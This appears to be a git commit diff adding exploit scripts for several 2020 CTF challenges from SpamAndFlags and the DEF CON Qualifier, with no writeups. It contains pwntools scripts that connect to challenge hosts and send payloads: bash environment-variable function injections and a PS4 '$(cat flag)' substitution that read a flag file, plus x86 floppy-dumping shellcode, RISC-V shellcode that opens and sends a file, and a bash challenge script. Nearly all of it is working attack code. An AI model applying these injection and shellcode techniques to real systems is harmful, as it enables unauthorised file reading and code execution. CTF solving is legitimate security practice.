Add solutions from a bunch of past CTFs (no writeups)

2020.05.08-SpamAndFlags_2020/environment/pwnit.py

@@ -0,0 +1,28 @@
+#!/usr/bin/env python3
+import json
+from pwn import *
+
+io = remote('35.242.189.239', 1337)
+# io = process(['python3', 'challenge.py'], cwd='environment')
+io.recvuntil(b'You may need to shutdown the input (send eof, -N in nc).\n')
+io.sendline(json.dumps([
+    ['BASH_ENV', 'flag', 'x'],
+    ['BASH_FUNC_echo%%', '() { cat flag; }', 'x'],
+    ['BASH_FUNC_test%%', '() { cat flag; }', 'x'],
+    ['BASH_FUNC_cat%%', '() { grep F <flag >/proc/1/fd/1; }', 'x'],
+    ['BASH_FUNC_grep%%', '() { cat flag >/proc/1/fd/1; }', 'x'],
+    ['USE_SED', '1', 'Q/rflag\n#'],
+    ['BASH_FUNC_bash%%', '() { cat flag; }', 'x'],
+    ['BASH_FUNC_set%%', '() { cat flag; }', 'x'],
+    ['BASH_FUNC_return%%', '() { cat flag; }', 'x'],
+    ['BASH_FUNC_eval%%', '() { cat flag; }', 'x'],
+    ['GREP_OPTIONS', '-fflag', 'flag'],
+    ['BASH_FUNC_exec%%', '() { cat flag; }', 'x'],
+    ['BASH_FUNC_hash%%', '() { export BASH_ENV=flag; false; }', 'x'],
+    # also works:
+    # ['BASH_FUNC_hash%%', '() { cat flag >/proc/1/fd/10; }', 'x'],
+    ['PS4', '$(cat flag)', 'x'],
+    ['BASH_FUNC_command_not_found_handle%%', '() { grep F <flag >/proc/1/fd/1; }', 'x'],
+]))
+io.shutdown()
+io.interactive()

2020.05.16-DEF_CON_CTF_Qualifier_2020/biooosless/Makefile

@@ -0,0 +1,16 @@
+CFLAGS := -m32 -march=i386 -Os -fPIC -ffunction-sections -fno-stack-protector -Wall -Wextra -Werror $(CFLAGS)
+
+shellcode.s: shellcode
+		objdump -D -b binary -mi386 $< >$@
+
+shellcode: shellcode.elf
+		objcopy -O binary -j.text $< $@
+
+shellcode.elf: shellcode.o shellcode.lds
+		ld -o $@ -m elf_i386 -nostdlib -T shellcode.lds $<
+
+shellcode.o: shellcode.c
+		gcc -c $(CFLAGS) -o $@ $<
+
+fmt:
+		clang-format -i -style=gnu shellcode.c

2020.05.16-DEF_CON_CTF_Qualifier_2020/biooosless/gdbscript

@@ -0,0 +1,11 @@
+set pagination off
+target remote localhost:1234
+set architecture i8086
+# skip until protected mode
+while $pc != 0xfffd6
+    si
+end
+set architecture i386
+layout asm
+b *0x7fbd8a4
+c

2020.05.16-DEF_CON_CTF_Qualifier_2020/biooosless/pwnit.py

@@ -0,0 +1,13 @@
+#!/usr/bin/env python3
+from pwn import *
+subprocess.check_call(['make'])
+with open('shellcode', 'rb') as fp:
+    shellcode = fp.read()
+io = remote('biooosless.challenges.ooo', 6543)
+io.recvuntil(b'Give me your shellcode size in hex (valid range: [0, 0x800]). Example: "0x100"\r\n')
+io.recvuntil(b'> ')
+io.sendline(hex(len(shellcode)))
+io.recvuntil(b'Give me your shellcode in base64 (in one line)\r\n')
+io.recvuntil(b'> ')
+io.sendline(base64.b64encode(shellcode))
+io.interactive()

2020.05.16-DEF_CON_CTF_Qualifier_2020/biooosless/shellcode.c

@@ -0,0 +1,233 @@
+/* include/linux/types.h */
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef _Bool bool;
+
+/* arch/x86/include/asm/irqflags.h */
+static inline void
+native_irq_disable (void)
+{
+  asm volatile("cli" : : : "memory");
+}
+
+static inline void
+native_halt (void)
+{
+  asm volatile("hlt" : : : "memory");
+}
+
+/* kernel/panic.c */
+__attribute__ ((noreturn)) static void
+panic (const char *fmt, ...)
+{
+  (void)fmt;
+  native_irq_disable ();
+  native_halt ();
+  __builtin_unreachable ();
+}
+
+/* arch/x86/boot/boot.h */
+static inline void
+outb (u8 v, u16 port)
+{
+  asm volatile("outb %0,%1" : : "a"(v), "dN"(port));
+}
+
+static inline u8
+inb (u16 port)
+{
+  u8 v;
+  asm volatile("inb %1,%0" : "=a"(v) : "dN"(port));
+  return v;
+}
+
+static inline void
+outw (u16 v, u16 port)
+{
+  asm volatile("outw %0,%1" : : "a"(v), "dN"(port));
+}
+
+static inline u16
+inw (u16 port)
+{
+  u16 v;
+  asm volatile("inw %1,%0" : "=a"(v) : "dN"(port));
+  return v;
+}
+
+static inline void
+outl (u32 v, u16 port)
+{
+  asm volatile("outl %0,%1" : : "a"(v), "dN"(port));
+}
+
+static inline u32
+inl (u16 port)
+{
+  u32 v;
+  asm volatile("inl %1,%0" : "=a"(v) : "dN"(port));
+  return v;
+}
+
+/* include/uapi/linux/fdreg.h */
+#define FD_IOPORT 0x3f0
+#define FD_DOR (2 + FD_IOPORT)
+#define FD_STATUS (4 + FD_IOPORT)
+#define FD_DATA (5 + FD_IOPORT)
+#define STATUS_BUSY 0x10  /* FDC busy */
+#define STATUS_DMA 0x20   /* 0- DMA mode */
+#define STATUS_DIR 0x40   /* 0- cpu->fdc */
+#define STATUS_READY 0x80 /* Data reg ready */
+#define FD_READ 0xE6      /* read with MT, MFM, SKip deleted */
+#define FD_VERSION 0x10   /* get version code */
+#define FD_CONFIGURE 0x13 /* configure FIFO operation */
+
+/* drivers/block/floppy.c */
+#define MAX_REPLIES 16
+static unsigned char reply_buffer[MAX_REPLIES];
+
+static int
+wait_til_ready (void)
+{
+  while (1)
+    {
+      int status = inb (FD_STATUS);
+      if (status & STATUS_READY)
+        return status;
+    }
+}
+
+static void
+output_byte (char byte)
+{
+  if (wait_til_ready () < 0)
+    panic ("output_byte");
+  outb (byte, FD_DATA);
+}
+
+/* gets the response from the fdc */
+static int
+result (void)
+{
+  for (int i = 0; i < MAX_REPLIES; i++)
+    {
+      int status = wait_til_ready ();
+      status &= STATUS_DIR | STATUS_READY | STATUS_BUSY | STATUS_DMA;
+      if ((status & ~STATUS_BUSY) == STATUS_READY)
+        return i;
+      if (status == (STATUS_DIR | STATUS_READY | STATUS_BUSY))
+        reply_buffer[i] = inb (FD_DATA);
+      else
+        break;
+    }
+  panic ("result");
+}
+
+static void
+reset_fdc (void)
+{
+  outb (0x80, FD_STATUS);
+}
+
+/* homebrew */
+#define VIDEO ((char *)0xb8000)
+#define ROWS 25
+#define COLS 80
+static int video_pos = 0;
+
+static void
+cls ()
+{
+  for (int i = 0; i < ROWS * COLS * 2;)
+    {
+      VIDEO[i++] = ' ';
+      VIDEO[i++] = 0x0f;
+    }
+  video_pos = 0;
+}
+
+static char HEX[] = { '0', '1', '2', '3', '4', '5', '6', '7',
+                      '8', '9', 'A', 'B', 'C', 'D', 'E', 'F' };
+
+static void
+hexdump (const unsigned char *buf, int n)
+{
+  for (int i = 0; i < n; i++)
+    {
+      VIDEO[video_pos] = HEX[buf[i] >> 4];
+      VIDEO[video_pos + 2] = HEX[buf[i] & 0xf];
+      video_pos += 4;
+    }
+}
+
+static void
+check_version (void)
+{
+  output_byte (FD_VERSION);
+  if (result () != 1 || reply_buffer[0] != 0x90)
+    panic ("FD_VERSION");
+}
+
+__attribute__ ((used)) static void
+shellcode (void)
+{
+  int drive = 0;
+
+  /* Make QEMU happy. Nothing else matters. */
+
+  /* QEMU does not care about motors. */
+  outb (4 | drive, FD_DOR); /* IRQ off */
+
+  /* QEMU assumes drive polling is off. */
+  /* QEMU assumes FIFO is on and threshold is 16. */
+  output_byte (FD_CONFIGURE);
+  output_byte (0);
+  output_byte (1 << 6 /* enable implied seek */);
+  output_byte (0); /* pre-compensation from track 0 upwards */
+
+  for (int c = 0; c < 80; c++)
+    {
+      for (int s = 1; s <= 18; s++)
+        {
+          for (int h = 0; h < 2; h++)
+            {
+              output_byte (FD_READ);
+              output_byte ((h << 2) | drive); /* head + drive */
+              output_byte (c);                /* cyl */
+              output_byte (h);                /* head */
+              output_byte (s);                /* sector */
+              output_byte (2);                /* 512 bytes per sector */
+              output_byte (18);               /* last sector 18 */
+              output_byte (0x1b);             /* GAP1 */
+              output_byte (0xff);             /* 512 bytes per sector */
+
+              u8 data[512];
+              u8 orall = 0;
+              for (unsigned int i = 0; i < sizeof (data); i++)
+                {
+                  data[i] = inb (FD_DATA);
+                  orall |= data[i];
+                }
+              if (orall == 0)
+                continue;
+              cls ();
+              hexdump (data, sizeof (data));
+              int i = 250000000;
+              asm volatile("1: dec %0\n"
+                           "jnz 1b\n"
+                           : "+r"(i)::"cc");
+            }
+        }
+    }
+
+  if (0)
+    {
+      check_version ();
+      outb (0x4, FD_DOR); /* PIO mode, drive 0 */
+      reset_fdc ();
+      hexdump ((const unsigned char *)shellcode, 0x20);
+    }
+  native_irq_disable ();
+  native_halt ();
+}

2020.05.16-DEF_CON_CTF_Qualifier_2020/nooopsled/Makefile

@@ -0,0 +1,28 @@
+riscv64.hex: riscv64 tohex2 verify2
+		./tohex2 <$< >$@.tmp
+		./verify2 <$@.tmp
+		mv $@.tmp $@
+
+riscv64: riscv64.elf
+		riscv64-linux-gnu-objcopy -O binary $< $@
+
+riscv64.elf: riscv64.o
+		riscv64-linux-gnu-ld -o $@ $<
+
+riscv64.o: riscv64.S
+		riscv64-linux-gnu-gcc -c -o $@ $<
+
+
+
+aarch64.hex: aarch64 tohex
+		./tohex <$< >$@.tmp
+		mv $@.tmp $@
+
+aarch64: aarch64.elf
+		aarch64-linux-gnu-objcopy -O binary $< $@
+
+aarch64.elf: aarch64.o
+		aarch64-linux-gnu-ld -o $@ $<
+
+aarch64.o: aarch64.S
+		aarch64-linux-gnu-gcc -c -o $@ $<

2020.05.16-DEF_CON_CTF_Qualifier_2020/nooopsled/pwnit.py

@@ -0,0 +1,9 @@
+#!/usr/bin/env python3
+from pwn import *
+io = remote('nooopsled.challenges.ooo', 5000)
+fp = open('riscv64.hex')
+io.recvuntil(b'What is your choice? ')
+io.send(fp.readline())
+io.recvuntil(b'Input your shellcode (in hex): ')
+io.send(fp.readline())
+io.interactive()

2020.05.16-DEF_CON_CTF_Qualifier_2020/nooopsled/riscv64.S

@@ -0,0 +1,32 @@
+#define __NR_openat 56
+#define __NR_splice 76
+#define __NR3264_sendfile 71
+#define AT_FDCWD -100
+#define O_RDONLY 0
+
+.globl _start
+.option rvc
+_start:
+    li a0, AT_FDCWD
+    lla a1, path
+    li a2, O_RDONLY
+    li a7, __NR_openat
+    scall
+    /* a0 = fd */
+    /*
+    li a1, 0
+    li a2, 1
+    li a3, 0
+    li a4, 32
+    li a5, 0
+    li a7, __NR_splice
+    scall
+    */
+    mv a1, a0
+    li a0, 1
+    //li a2, 0
+    //li a3, 32 // a3 seems to contain big enough value already
+    li a7, __NR3264_sendfile
+    scall
+path:
+    .string "flag"

2020.05.16-DEF_CON_CTF_Qualifier_2020/ooobash/pwnit.sh

@@ -0,0 +1,15 @@
+OOOENV=alsulkxjcn92 exec bash -C -L -S -i
+unlockbabylock  # L1
+alias yo='echo yo!'; alias yo='echo yo!'  # L2
+xx() { true; }; x() { true; }  # L3
+sh -c 'exit 57'  # L4
+echo >"/tmp/lee9xiSh$RANDOM.sneaky"  # L5
+kill -SIGUSR1 "$$"  # L6
+if true; then false; fi  # L7
+a
+b
+c
+echo >/dev/tcp/127.0.0.1/53
+bad=/tmp/lee9xiSh$RANDOM.badr3d1r && echo >"$bad" && echo >"$bad"
+declare -r -A ARO; declare ARO[0]=0
+getflag